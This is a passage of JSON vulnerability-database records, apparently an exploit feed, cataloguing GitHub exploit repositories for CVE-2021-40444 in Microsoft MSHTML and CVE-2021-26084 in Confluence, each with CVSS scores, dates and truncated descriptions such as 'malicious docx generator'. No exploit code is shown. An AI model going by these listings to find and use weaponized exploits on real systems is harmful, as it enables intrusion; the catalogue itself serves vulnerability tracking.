["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T20:18:53", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "CC614155-FD7D-599B-B89C-006B26D76F48", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-11T11:54:31", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "69FAE88E-7F22-5ACC-B555-3441BE00C566", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:01", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T17:29:36", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "5C66B0C2-B7C3-5BF1-AE5C-846940E188A6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:25:08", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 